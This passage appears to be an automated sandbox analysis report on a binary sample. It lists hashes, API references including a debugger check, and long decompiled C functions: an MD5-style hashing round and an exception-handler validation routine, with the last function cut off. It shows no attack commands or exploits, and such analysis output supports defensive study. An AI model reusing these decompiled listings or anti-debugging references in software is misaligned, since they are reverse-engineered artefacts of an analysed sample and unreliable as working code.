                  • Instruction ID: 7ec12d1887f3a2a2b84d9ad04a5b183c40a845c39ba7fdf75bf23d34efd87033
                  • Opcode Fuzzy Hash: f11e8e66604da46065dcfa963aa3c7da54eb7da95b143a2119ea86c7273e2f5f
                  • Instruction Fuzzy Hash: 01F08171568B01ABDF505FE9682D7483BF4B70BF52F100195FE95C61D4D7B080468B49
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • _memset.LIBCMT ref: 6E10C700
                  • IsDebuggerPresent.KERNEL32(?,?,00000001), ref: 6E10C7B5
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: DebuggerPresent_memset
                  • String ID:
                  • API String ID: 2328436684-0
                  • Opcode ID: 0e1d012c1fdb80c9ab26fe14210386c0054b7843f348e166398ae7f45df335cd
                  • Instruction ID: 54b1aacd82f1d66fd9d6538128f3537c0b39c24905321a143d4ba20b915dc0a9
                  • Opcode Fuzzy Hash: 0e1d012c1fdb80c9ab26fe14210386c0054b7843f348e166398ae7f45df335cd
                  • Instruction Fuzzy Hash: A231047581122C9BCB61DF64D8887CCBBB8BF08314F6042EAE81CA7250EB309BC59F45
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,6E10C7C9,?,?,?,00000001), ref: 6E1110C6
                  • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 6E1110CF
                  Memory Dump Source
                  • Source File: 00000000.00000002.473938723.000000006E0D0000.00000020.00020000.sdmp, Offset: 6E0D0000, based on PE: false
                  Similarity
                  • API ID: ExceptionFilterUnhandled
                  • String ID:
                  • API String ID: 3192549508-0
                  • Opcode ID: c4252beb61ed8afb8b42ca864e6bd1400bf1d7e104f2c7147be88b06d395fc6e
                  • Instruction ID: c8b3cf8ad102c6d1e167b364dd94f7459c6f59274db3a5ef9e33e2da913af7cf
                  • Opcode Fuzzy Hash: c4252beb61ed8afb8b42ca864e6bd1400bf1d7e104f2c7147be88b06d395fc6e
                  • Instruction Fuzzy Hash: D7B09231644609FFCE222B92DD0AF8C3F38EB06662F018010F62D48054AF626490AAA9
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 49%
                  			E00BB8045(void* __ecx, intOrPtr* _a4) {
                  				signed int _v8;
                  				signed int _v12;
                  				intOrPtr _v16;
                  				intOrPtr _v20;
                  				intOrPtr _v24;
                  				intOrPtr _v28;
                  				intOrPtr _v32;
                  				intOrPtr _v36;
                  				intOrPtr _v40;
                  				intOrPtr _v44;
                  				intOrPtr _v48;
                  				intOrPtr _v52;
                  				intOrPtr _v56;
                  				intOrPtr _v60;
                  				intOrPtr _v64;
                  				intOrPtr _v68;
                  				intOrPtr _v72;
                  				void _v76;
                  				intOrPtr* _t226;
                  				signed int _t229;
                  				signed int _t231;
                  				signed int _t233;
                  				signed int _t235;
                  				signed int _t237;
                  				signed int _t239;
                  				signed int _t241;
                  				signed int _t243;
                  				signed int _t245;
                  				signed int _t247;
                  				signed int _t249;
                  				signed int _t251;
                  				signed int _t253;
                  				signed int _t255;
                  				signed int _t257;
                  				signed int _t259;
                  				signed int _t338;
                  				signed char* _t348;
                  				signed int _t349;
                  				signed int _t351;
                  				signed int _t353;
                  				signed int _t355;
                  				signed int _t357;
                  				signed int _t359;
                  				signed int _t361;
                  				signed int _t363;
                  				signed int _t365;
                  				signed int _t367;
                  				signed int _t376;
                  				signed int _t378;
                  				signed int _t380;
                  				signed int _t382;
                  				signed int _t384;
                  				intOrPtr* _t400;
                  				signed int* _t401;
                  				signed int _t402;
                  				signed int _t404;
                  				signed int _t406;
                  				signed int _t408;
                  				signed int _t410;
                  				signed int _t412;
                  				signed int _t414;
                  				signed int _t416;
                  				signed int _t418;
                  				signed int _t420;
                  				signed int _t422;
                  				signed int _t424;
                  				signed int _t432;
                  				signed int _t434;
                  				signed int _t436;
                  				signed int _t438;
                  				signed int _t440;
                  				signed int _t508;
                  				signed int _t599;
                  				signed int _t607;
                  				signed int _t613;
                  				signed int _t679;
                  				void* _t682;
                  				signed int _t683;
                  				signed int _t685;
                  				signed int _t690;
                  				signed int _t692;
                  				signed int _t697;
                  				signed int _t699;
                  				signed int _t718;
                  				signed int _t720;
                  				signed int _t722;
                  				signed int _t724;
                  				signed int _t726;
                  				signed int _t728;
                  				signed int _t734;
                  				signed int _t740;
                  				signed int _t742;
                  				signed int _t744;
                  				signed int _t746;
                  				signed int _t748;
                  
                  				_t226 = _a4;
                  				_t348 = __ecx + 2;
                  				_t401 =  &_v76;
                  				_t682 = 0x10;
                  				do {
                  					 *_t401 = (((_t348[1] & 0x000000ff) << 0x00000008 |  *_t348 & 0x000000ff) << 0x00000008 |  *(_t348 - 1) & 0x000000ff) << 0x00000008 |  *(_t348 - 2) & 0x000000ff;
                  					_t401 =  &(_t401[1]);
                  					_t348 =  &(_t348[4]);
                  					_t682 = _t682 - 1;
                  				} while (_t682 != 0);
                  				_t6 = _t226 + 4; // 0x14eb3fc3
                  				_t683 =  *_t6;
                  				_t7 = _t226 + 8; // 0x8d08458b
                  				_t402 =  *_t7;
                  				_t8 = _t226 + 0xc; // 0x56c1184c
                  				_t349 =  *_t8;
                  				asm("rol eax, 0x7");
                  				_t229 = ( !_t683 & _t349 | _t402 & _t683) + _v76 +  *_t226 - 0x28955b88 + _t683;
                  				asm("rol ecx, 0xc");
                  				_t351 = ( !_t229 & _t402 | _t683 & _t229) + _v72 + _t349 - 0x173848aa + _t229;
                  				asm("ror edx, 0xf");
                  				_t404 = ( !_t351 & _t683 | _t351 & _t229) + _v68 + _t402 + 0x242070db + _t351;
                  				asm("ror esi, 0xa");
                  				_t685 = ( !_t404 & _t229 | _t351 & _t404) + _v64 + _t683 - 0x3e423112 + _t404;
                  				_v8 = _t685;
                  				_t690 = _v8;
                  				asm("rol eax, 0x7");
                  				_t231 = ( !_t685 & _t351 | _t404 & _v8) + _v60 + _t229 - 0xa83f051 + _t690;
                  				asm("rol ecx, 0xc");
                  				_t353 = ( !_t231 & _t404 | _t690 & _t231) + _v56 + _t351 + 0x4787c62a + _t231;
                  				asm("ror edx, 0xf");
                  				_t406 = ( !_t353 & _t690 | _t353 & _t231) + _v52 + _t404 - 0x57cfb9ed + _t353;
                  				asm("ror esi, 0xa");
                  				_t692 = ( !_t406 & _t231 | _t353 & _t406) + _v48 + _t690 - 0x2b96aff + _t406;
                  				_v8 = _t692;
                  				_t697 = _v8;
                  				asm("rol eax, 0x7");
                  				_t233 = ( !_t692 & _t353 | _t406 & _v8) + _v44 + _t231 + 0x698098d8 + _t697;
                  				asm("rol ecx, 0xc");
                  				_t355 = ( !_t233 & _t406 | _t697 & _t233) + _v40 + _t353 - 0x74bb0851 + _t233;
                  				asm("ror edx, 0xf");
                  				_t408 = ( !_t355 & _t697 | _t355 & _t233) + _v36 + _t406 - 0xa44f + _t355;
                  				asm("ror esi, 0xa");
                  				_t699 = ( !_t408 & _t233 | _t355 & _t408) + _v32 + _t697 - 0x76a32842 + _t408;
                  				_v8 = _t699;
                  				asm("rol eax, 0x7");
                  				_t235 = ( !_t699 & _t355 | _t408 & _v8) + _v28 + _t233 + 0x6b901122 + _v8;
                  				asm("rol ecx, 0xc");
                  				_t357 = ( !_t235 & _t408 | _v8 & _t235) + _v24 + _t355 - 0x2678e6d + _t235;
                  				_t508 =  !_t357;
                  				asm("ror edx, 0xf");
                  				_t410 = (_t508 & _v8 | _t357 & _t235) + _v20 + _t408 - 0x5986bc72 + _t357;
                  				_v12 = _t410;
                  				_v12 =  !_v12;
                  				asm("ror esi, 0xa");
                  				_t718 = (_v12 & _t235 | _t357 & _t410) + _v16 + _v8 + 0x49b40821 + _t410;
                  				asm("rol eax, 0x5");
                  				_t237 = (_t508 & _t410 | _t357 & _t718) + _v72 + _t235 - 0x9e1da9e + _t718;
                  				asm("rol ecx, 0x9");
                  				_t359 = (_v12 & _t718 | _t410 & _t237) + _v52 + _t357 - 0x3fbf4cc0 + _t237;
                  				asm("rol edx, 0xe");
                  				_t412 = ( !_t718 & _t237 | _t359 & _t718) + _v32 + _t410 + 0x265e5a51 + _t359;
                  				asm("ror esi, 0xc");
                  				_t720 = ( !_t237 & _t359 | _t412 & _t237) + _v76 + _t718 - 0x16493856 + _t412;
                  				asm("rol eax, 0x5");
                  				_t239 = ( !_t359 & _t412 | _t359 & _t720) + _v56 + _t237 - 0x29d0efa3 + _t720;
                  				asm("rol ecx, 0x9");
                  				_t361 = ( !_t412 & _t720 | _t412 & _t239) + _v36 + _t359 + 0x2441453 + _t239;
                  				asm("rol edx, 0xe");
                  				_t414 = ( !_t720 & _t239 | _t361 & _t720) + _v16 + _t412 - 0x275e197f + _t361;
                  				asm("ror esi, 0xc");
                  				_t722 = ( !_t239 & _t361 | _t414 & _t239) + _v60 + _t720 - 0x182c0438 + _t414;
                  				asm("rol eax, 0x5");
                  				_t241 = ( !_t361 & _t414 | _t361 & _t722) + _v40 + _t239 + 0x21e1cde6 + _t722;
                  				asm("rol ecx, 0x9");
                  				_t363 = ( !_t414 & _t722 | _t414 & _t241) + _v20 + _t361 - 0x3cc8f82a + _t241;
                  				asm("rol edx, 0xe");
                  				_t416 = ( !_t722 & _t241 | _t363 & _t722) + _v64 + _t414 - 0xb2af279 + _t363;
                  				asm("ror esi, 0xc");
                  				_t724 = ( !_t241 & _t363 | _t416 & _t241) + _v44 + _t722 + 0x455a14ed + _t416;
                  				asm("rol eax, 0x5");
                  				_t243 = ( !_t363 & _t416 | _t363 & _t724) + _v24 + _t241 - 0x561c16fb + _t724;
                  				asm("rol ecx, 0x9");
                  				_t365 = ( !_t416 & _t724 | _t416 & _t243) + _v68 + _t363 - 0x3105c08 + _t243;
                  				asm("rol edx, 0xe");
                  				_t418 = ( !_t724 & _t243 | _t365 & _t724) + _v48 + _t416 + 0x676f02d9 + _t365;
                  				asm("ror esi, 0xc");
                  				_t726 = ( !_t243 & _t365 | _t418 & _t243) + _v28 + _t724 - 0x72d5b376 + _t418;
                  				asm("rol eax, 0x4");
                  				_t245 = (_t365 ^ _t418 ^ _t726) + _v56 + _t243 - 0x5c6be + _t726;
                  				asm("rol ecx, 0xb");
                  				_t367 = (_t418 ^ _t726 ^ _t245) + _v44 + _t365 - 0x788e097f + _t245;
                  				asm("rol edx, 0x10");
                  				_t420 = (_t367 ^ _t726 ^ _t245) + _v32 + _t418 + 0x6d9d6122 + _t367;
                  				_t599 = _t367 ^ _t420;
                  				asm("ror esi, 0x9");
                  				_t728 = (_t599 ^ _t245) + _v20 + _t726 - 0x21ac7f4 + _t420;
                  				asm("rol eax, 0x4");
                  				_t247 = (_t599 ^ _t728) + _v72 + _t245 - 0x5b4115bc + _t728;
                  				asm("rol edi, 0xb");
                  				_t607 = (_t420 ^ _t728 ^ _t247) + _v60 + _t367 + 0x4bdecfa9 + _t247;
                  				asm("rol edx, 0x10");
                  				_t422 = (_t607 ^ _t728 ^ _t247) + _v48 + _t420 - 0x944b4a0 + _t607;
                  				_t338 = _t607 ^ _t422;
                  				asm("ror ecx, 0x9");
                  				_t376 = (_t338 ^ _t247) + _v36 + _t728 - 0x41404390 + _t422;
                  				asm("rol eax, 0x4");
                  				_t249 = (_t338 ^ _t376) + _v24 + _t247 + 0x289b7ec6 + _t376;
                  				asm("rol esi, 0xb");
                  				_t734 = (_t422 ^ _t376 ^ _t249) + _v76 + _t607 - 0x155ed806 + _t249;
                  				asm("rol edi, 0x10");
                  				_t613 = (_t734 ^ _t376 ^ _t249) + _v64 + _t422 - 0x2b10cf7b + _t734;
                  				_t424 = _t734 ^ _t613;
                  				asm("ror ecx, 0x9");
                  				_t378 = (_t424 ^ _t249) + _v52 + _t376 + 0x4881d05 + _t613;
                  				asm("rol eax, 0x4");
                  				_t251 = (_t424 ^ _t378) + _v40 + _t249 - 0x262b2fc7 + _t378;
                  				asm("rol edx, 0xb");
                  				_t432 = (_t613 ^ _t378 ^ _t251) + _v28 + _t734 - 0x1924661b + _t251;
                  				asm("rol esi, 0x10");
                  				_t740 = (_t432 ^ _t378 ^ _t251) + _v16 + _t613 + 0x1fa27cf8 + _t432;
                  				asm("ror ecx, 0x9");
                  				_t380 = (_t432 ^ _t740 ^ _t251) + _v68 + _t378 - 0x3b53a99b + _t740;
                  				asm("rol eax, 0x6");
                  				_t253 = (( !_t432 | _t380) ^ _t740) + _v76 + _t251 - 0xbd6ddbc + _t380;
                  				asm("rol edx, 0xa");
                  				_t434 = (( !_t740 | _t253) ^ _t380) + _v48 + _t432 + 0x432aff97 + _t253;
                  				asm("rol esi, 0xf");
                  				_t742 = (( !_t380 | _t434) ^ _t253) + _v20 + _t740 - 0x546bdc59 + _t434;
                  				asm("ror ecx, 0xb");
                  				_t382 = (( !_t253 | _t742) ^ _t434) + _v56 + _t380 - 0x36c5fc7 + _t742;
                  				asm("rol eax, 0x6");
                  				_t255 = (( !_t434 | _t382) ^ _t742) + _v28 + _t253 + 0x655b59c3 + _t382;
                  				asm("rol edx, 0xa");
                  				_t436 = (( !_t742 | _t255) ^ _t382) + _v64 + _t434 - 0x70f3336e + _t255;
                  				asm("rol esi, 0xf");
                  				_t744 = (( !_t382 | _t436) ^ _t255) + _v36 + _t742 - 0x100b83 + _t436;
                  				asm("ror ecx, 0xb");
                  				_t384 = (( !_t255 | _t744) ^ _t436) + _v72 + _t382 - 0x7a7ba22f + _t744;
                  				asm("rol eax, 0x6");
                  				_t257 = (( !_t436 | _t384) ^ _t744) + _v44 + _t255 + 0x6fa87e4f + _t384;
                  				asm("rol edx, 0xa");
                  				_t438 = (( !_t744 | _t257) ^ _t384) + _v16 + _t436 - 0x1d31920 + _t257;
                  				asm("rol esi, 0xf");
                  				_t746 = (( !_t384 | _t438) ^ _t257) + _v52 + _t744 - 0x5cfebcec + _t438;
                  				asm("ror edi, 0xb");
                  				_t679 = (( !_t257 | _t746) ^ _t438) + _v24 + _t384 + 0x4e0811a1 + _t746;
                  				asm("rol eax, 0x6");
                  				_t259 = (( !_t438 | _t679) ^ _t746) + _v60 + _t257 - 0x8ac817e + _t679;
                  				asm("rol edx, 0xa");
                  				_t440 = (( !_t746 | _t259) ^ _t679) + _v32 + _t438 - 0x42c50dcb + _t259;
                  				_t400 = _a4;
                  				asm("rol esi, 0xf");
                  				_t748 = (( !_t679 | _t440) ^ _t259) + _v68 + _t746 + 0x2ad7d2bb + _t440;
                  				 *_t400 =  *_t400 + _t259;
                  				asm("ror eax, 0xb");
                  				 *((intOrPtr*)(_t400 + 4)) = (( !_t259 | _t748) ^ _t440) + _v40 + _t679 - 0x14792c6f +  *((intOrPtr*)(_t400 + 4)) + _t748;
                  				 *((intOrPtr*)(_t400 + 8)) =  *((intOrPtr*)(_t400 + 8)) + _t748;
                  				 *((intOrPtr*)(_t400 + 0xc)) =  *((intOrPtr*)(_t400 + 0xc)) + _t440;
                  				return memset( &_v76, 0, 0x40);
                  			}


                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.468762807.0000000000BB1000.00000020.00000001.sdmp, Offset: 00BB0000, based on PE: true
                  • Associated: 00000000.00000002.468748716.0000000000BB0000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468850295.0000000000BBC000.00000002.00000001.sdmp
                  • Associated: 00000000.00000002.468892821.0000000000BBD000.00000004.00000001.sdmp
                  • Associated: 00000000.00000002.468934052.0000000000BBF000.00000002.00000001.sdmp
                  Similarity
                  • API ID: memset
                  • String ID:
                  • API String ID: 2221118986-0
                  • Opcode ID: 2c114970060823254187c0ea4b4ef3afbdff05c350dc032471e6efce3afd0d2d
                  • Instruction ID: 7320079825a33bdf1920c0012ea169c571f349df60bcd17ff203cca0c4f314f7
                  • Opcode Fuzzy Hash: 2c114970060823254187c0ea4b4ef3afbdff05c350dc032471e6efce3afd0d2d
                  • Instruction Fuzzy Hash: 1122857BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E6E0C23A5(long _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				signed int _v16;
                  				short* _v32;
                  				void _v36;
                  				void* _t57;
                  				signed int _t58;
                  				signed int _t61;
                  				signed int _t62;
                  				void* _t63;
                  				signed int* _t68;
                  				intOrPtr* _t69;
                  				intOrPtr* _t71;
                  				intOrPtr _t72;
                  				intOrPtr _t75;
                  				void* _t76;
                  				signed int _t77;
                  				void* _t78;
                  				void _t80;
                  				signed int _t81;
                  				signed int _t84;
                  				signed int _t86;
                  				short* _t87;
                  				void* _t89;
                  				signed int* _t90;
                  				long _t91;
                  				signed int _t93;
                  				signed int _t94;
                  				signed int _t100;
                  				signed int _t102;
                  				void* _t104;
                  				long _t108;
                  				signed int _t110;
                  
                  				_t108 = _a4;
                  				_t76 =  *(_t108 + 8);
                  				if((_t76 & 0x00000003) != 0) {
                  					L3:
                  					return 0;
                  				}
                  				_a4 =  *[fs:0x4];
                  				_v8 =  *[fs:0x8];
                  				if(_t76 < _v8 || _t76 >= _a4) {
                  					_t102 =  *(_t108 + 0xc);
                  					__eflags = _t102 - 0xffffffff;
                  					if(_t102 != 0xffffffff) {
                  						_t91 = 0;
                  						__eflags = 0;
                  						_a4 = 0;
                  						_t57 = _t76;
                  						do {
                  							_t80 =  *_t57;
                  							__eflags = _t80 - 0xffffffff;
                  							if(_t80 == 0xffffffff) {
                  								goto L9;
                  							}
                  							__eflags = _t80 - _t91;
                  							if(_t80 >= _t91) {
                  								L20:
                  								_t63 = 0;
                  								L60:
                  								return _t63;
                  							}
                  							L9:
                  							__eflags =  *(_t57 + 4);
                  							if( *(_t57 + 4) != 0) {
                  								_t12 =  &_a4;
                  								 *_t12 = _a4 + 1;
                  								__eflags =  *_t12;
                  							}
                  							_t91 = _t91 + 1;
                  							_t57 = _t57 + 0xc;
                  							__eflags = _t91 - _t102;
                  						} while (_t91 <= _t102);
                  						__eflags = _a4;
                  						if(_a4 == 0) {
                  							L15:
                  							_t81 =  *0x6e0c4178;
                  							_t110 = _t76 & 0xfffff000;
                  							_t58 = 0;
                  							__eflags = _t81;
                  							if(_t81 <= 0) {
                  								L18:
                  								_t104 = _t102 | 0xffffffff;
                  								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
                  								__eflags = _t61;
                  								if(_t61 < 0) {
                  									_t62 = 0;
                  									__eflags = 0;
                  								} else {
                  									_t62 = _a4;
                  								}
                  								__eflags = _t62;
                  								if(_t62 == 0) {
                  									L59:
                  									_t63 = _t104;
                  									goto L60;
                  								} else {
                  									__eflags = _v12 - 0x1000000;
                  									if(_v12 != 0x1000000) {
                  										goto L59;
                  									}
                  									__eflags = _v16 & 0x000000cc;
                  									if((_v16 & 0x000000cc) == 0) {
                  										L46:
                  										_t63 = 1;
                  										 *0x6e0c41c0 = 1;
                  										__eflags =  *0x6e0c41c0;
                  										if( *0x6e0c41c0 != 0) {
                  											goto L60;
                  										}
                  										_t84 =  *0x6e0c4178;
                  										__eflags = _t84;
                  										_t93 = _t84;
                  										if(_t84 <= 0) {
                  											L51:
                  											__eflags = _t93;
                  											if(_t93 != 0) {
                  												L58:
                  												 *0x6e0c41c0 = 0;
                  												goto L5;
                  											}
                  											_t77 = 0xf;
                  											__eflags = _t84 - _t77;
                  											if(_t84 <= _t77) {
                  												_t77 = _t84;
                  											}
                  											_t94 = 0;
                  											__eflags = _t77;
                  											if(_t77 < 0) {
                  												L56:
                  												__eflags = _t84 - 0x10;
                  												if(_t84 < 0x10) {
                  													_t86 = _t84 + 1;
                  													__eflags = _t86;
                  													 *0x6e0c4178 = _t86;
                  												}
                  												goto L58;
                  											} else {
                  												do {
                  													_t68 = 0x6e0c4180 + _t94 * 4;
                  													_t94 = _t94 + 1;
                  													__eflags = _t94 - _t77;
                  													 *_t68 = _t110;
                  													_t110 =  *_t68;
                  												} while (_t94 <= _t77);
                  												goto L56;
                  											}
                  										}
                  										_t69 = 0x6e0c417c + _t84 * 4;
                  										while(1) {
                  											__eflags =  *_t69 - _t110;
                  											if( *_t69 == _t110) {
                  												goto L51;
                  											}
                  											_t93 = _t93 - 1;
                  											_t69 = _t69 - 4;
                  											__eflags = _t93;
                  											if(_t93 > 0) {
                  												continue;
                  											}
                  											goto L51;
                  										}
                  										goto L51;
                  									}
                  									_t87 = _v32;
                  									__eflags =  *_t87 - 0x5a4d;
                  									if( *_t87 != 0x5a4d) {
                  										goto L59;
                  									}
                  									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
                  									__eflags =  *_t71 - 0x4550;
                  									if( *_t71 != 0x4550) {
                  										goto L59;
                  									}
                  									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
                  									if( *((short*)(_t71 + 0x18)) != 0x10b) {
                  										goto L59;
                  									}
                  									_t78 = _t76 - _t87;
                  									__eflags =  *((short*)(_t71 + 6));
                  									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
                  									if( *((short*)(_t71 + 6)) <= 0) {
                  										goto L59;
                  									}
                  									_t72 =  *((intOrPtr*)(_t89 + 0xc));
                  									__eflags = _t78 - _t72;
                  									if(_t78 < _t72) {
                  										goto L46;
                  									}
                  									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
                  									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
                  										goto L46;
                  									}
                  									__eflags =  *(_t89 + 0x27) & 0x00000080;
                  									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
                  										goto L20;
                  									}
                  									goto L46;
                  								}
                  							} else {
                  								goto L16;
                  							}
                  							while(1) {
                  								L16:
                  								__eflags =  *((intOrPtr*)(0x6e0c4180 + _t58 * 4)) - _t110;
                  								if( *((intOrPtr*)(0x6e0c4180 + _t58 * 4)) == _t110) {
                  									break;
                  								}
                  								_t58 = _t58 + 1;
                  								__eflags = _t58 - _t81;
                  								if(_t58 < _t81) {
                  									continue;
                  								}
                  								goto L18;
                  							}
                  							__eflags = _t58;
                  							if(_t58 <= 0) {
                  								goto L5;
                  							}
                  							 *0x6e0c41c0 = 1;
                  							__eflags =  *0x6e0c41c0;
                  							if( *0x6e0c41c0 != 0) {
                  								goto L5;
                  							}
                  							__eflags =  *((intOrPtr*)(0x6e0c4180 + _t58 * 4)) - _t110;
                  							if( *((intOrPtr*)(0x6e0c4180 + _t58 * 4)) == _t110) {
                  								L32:
                  								_t100 = 0;
                  								__eflags = _t58;
                  								if(_t58 < 0) {
                  									L34:
                  									 *0x6e0c41c0 = 0;
                  									goto L5;
                  								} else {
                  									goto L33;
                  								}
                  								do {
                  									L33:
                  									_t90 = 0x6e0c4180 + _t100 * 4;
                  									_t100 = _t100 + 1;
                  									__eflags = _t100 - _t58;
                  									 *_t90 = _t110;
                  									_t110 =  *_t90;
                  								} while (_t100 <= _t58);
                  								goto L34;
                  							}
                  							_t58 = _t81 - 1;
                  							__eflags = _t58;
                  							if(_t58 < 0) {
                  								L28:
                  								__eflags = _t81 - 0x10;
                  								if(_t81 < 0x10) {
                  									_t81 = _t81 + 1;
                  									__eflags = _t81;
                  									 *0x6e0c4178 = _t81;
                  								}
                  								_t58 = _t81 - 1;
                  								goto L32;
                  							} else {
                  								goto L25;
                  							}
                  							while(1) {
                  								L25:
                  								__eflags =  *((intOrPtr*)(0x6e0c4180 + _t58 * 4)) - _t110;
                  								if( *((intOrPtr*)(0x6e0c4180 + _t58 * 4)) == _t110) {
                  									break;
                  								}
                  								_t58 = _t58 - 1;
                  								__eflags = _t58;
                  								if(_t58 >= 0) {
                  									continue;
                  								}
                  								break;
                  							}
                  							__eflags = _t58;
                  							if(__eflags >= 0) {
                  								if(__eflags == 0) {
                  									goto L34;
                  								}
                  								goto L32;
                  							}
                  							goto L28;
                  						}
                  						_t75 =  *((intOrPtr*)(_t108 - 8));
                  						__eflags = _t75 - _v8;
                  						if(_t75 < _v8) {
                  							goto L20;
                  						}
                  						__eflags = _t75 - _t108;
                  						if(_t75 >= _t108) {
                  							goto L20;
                  						}
                  						goto L15;
                  					}
                  					L5:
                  					_t63 = 1;
                  					goto L60;
                  				} else {
                  					goto L3;
                  				}
                  			}

                  0x6e0c258c
                  0x6e0c258e
                  0x6e0c2590
                  0x6e0c2592
                  0x6e0c25a6
                  0x6e0c25a6
                  0x6e0c25a9
                  0x6e0c25ab
                  0x6e0c25ab
                  0x6e0c25ac
                  0x6e0c25ac
                  0x00000000
                  0x6e0c2594
                  0x6e0c2594
                  0x6e0c2594
                  0x6e0c259d
                  0x6e0c259e
                  0x6e0c25a0
                  0x6e0c25a2
                  0x6e0c25a2
                  0x00000000
                  0x6e0c2594
                  0x6e0c2592
                  0x6e0c256e
                  0x6e0c2575
                  0x6e0c2575
                  0x6e0c2577
                  0x00000000
                  0x00000000
                  0x6e0c2579
                  0x6e0c257a
                  0x6e0c257d
                  0x6e0c257f
                  0x00000000
                  0x00000000
                  0x00000000
                  0x6e0c257f
                  0x00000000
                  0x6e0c2575
                  0x6e0c24f8
                  0x6e0c24fb
                  0x6e0c2500
                  0x00000000
                  0x00000000
                  0x6e0c2509
                  0x6e0c250b
                  0x6e0c2511
                  0x00000000
                  0x00000000
                  0x6e0c2517
                  0x6e0c251d
                  0x00000000
                  0x00000000
                  0x6e0c2523
                  0x6e0c2525
                  0x6e0c252e
                  0x6e0c2532
                  0x00000000
                  0x00000000
                  0x6e0c2538
                  0x6e0c253b
                  0x6e0c253d
                  0x00000000
                  0x00000000
                  0x6e0c2544
                  0x6e0c2546
                  0x00000000
                  0x00000000
                  0x6e0c2548
                  0x6e0c254c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x6e0c254c
                  0x00000000
                  0x00000000
                  0x00000000
                  0x6e0c2437
                  0x6e0c2437
                  0x6e0c2437
                  0x6e0c243e
                  0x00000000
                  0x00000000
                  0x6e0c2440
                  0x6e0c2441
                  0x6e0c2443
                  0x00000000
                  0x00000000
                  0x00000000
                  0x6e0c2443
                  0x6e0c246b
                  0x6e0c246d
                  0x00000000
                  0x00000000
                  0x6e0c247d
                  0x6e0c247f
                  0x6e0c2481
                  0x00000000
                  0x00000000
                  0x6e0c2487
                  0x6e0c248e
                  0x6e0c24ba
                  0x6e0c24ba
                  0x6e0c24bc
                  0x6e0c24be
                  0x6e0c24d2
                  0x6e0c24d4
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x6e0c24c0
                  0x6e0c24c0
                  0x6e0c24c0
                  0x6e0c24c9
                  0x6e0c24ca
                  0x6e0c24cc
                  0x6e0c24ce
                  0x6e0c24ce
                  0x00000000
                  0x6e0c24c0
                  0x6e0c2490
                  0x6e0c2493
                  0x6e0c2495
                  0x6e0c24a7
                  0x6e0c24a7
                  0x6e0c24aa
                  0x6e0c24ac
                  0x6e0c24ac
                  0x6e0c24ad
                  0x6e0c24ad
                  0x6e0c24b3
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x6e0c2497
                  0x6e0c2497
                  0x6e0c2497
                  0x6e0c249e
                  0x00000000
                  0x00000000
                  0x6e0c24a0
                  0x6e0c24a0
                  0x6e0c24a1
                  0x00000000
                  0x00000000
                  0x00000000
                  0x6e0c24a1
                  0x6e0c24a3
                  0x6e0c24a5
                  0x6e0c24b8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x6e0c24b8
                  0x00000000
                  0x6e0c24a5
                  0x6e0c2417
                  0x6e0c241a
                  0x6e0c241d
                  0x00000000
                  0x00000000
                  0x6e0c241f
                  0x6e0c2421
                  0x00000000
                  0x00000000
                  0x00000000
                  0x6e0c2421
                  0x6e0c23e6
                  0x6e0c23e8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000

                  APIs
                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6E0C2456
                  Memory Dump Source
                  • Source File: 00000000.00000002.473873275.000000006E0C1000.00000020.00020000.sdmp, Offset: 6E0C0000, based on PE: true
                  • Associated: 00000000.00000002.473861894.000000006E0C0000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473885975.000000006E0C3000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.473899226.000000006E0C5000.00000004.00020000.sdmp
                  • Associated: 00000000.00000002.473916514.000000006E0C6000.00000002.00020000.sdmp
                  Similarity
                  • API ID: MemoryQueryVirtual
                  • String ID:
                  • API String ID: 2850889275-0
                  • Opcode ID: 03581c44e442ac06842356860651c5946b8298d0283736c6146b9051fba1829c
                  • Instruction ID: 6400ac15503ae59ace1dcc1bbec503436a554a746a77a3604d9e1f446f5115a2
                  • Opcode Fuzzy Hash: 03581c44e442ac06842356860651c5946b8298d0283736c6146b9051fba1829c
                  • Instruction Fuzzy Hash: 2B61D130614E06DFDB59CEA9C8A075E33F5FB4AF94B21A428D856C7A84F770D8828752
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 100%
                  			E00BBB301(long _a4) {
                  				intOrPtr _v8;
                  				intOrPtr _v12;
                  				signed int _v16;
                  				short* _v32;
                  				void _v36;
                  				void* _t57;
                  				signed int _t58;
                  				signed int _t61;
                  				signed int _t62;
                  				void* _t63;
                  				signed int* _t68;
                  				intOrPtr* _t69;
                  				intOrPtr* _t71;
                  				intOrPtr _t72;
                  				intOrPtr _t75;
                  				void* _t76;
                  				signed int _t77;
                  				void* _t78;
                  				void _t80;
                  				signed int _t81;
                  				signed int _t84;
                  				signed int _t86;
                  				short* _t87;
                  				void* _t89;
                  				signed int* _t90;
                  				long _t91;
                  				signed int _t93;
                  				signed int _t94;
                  				signed int _t100;
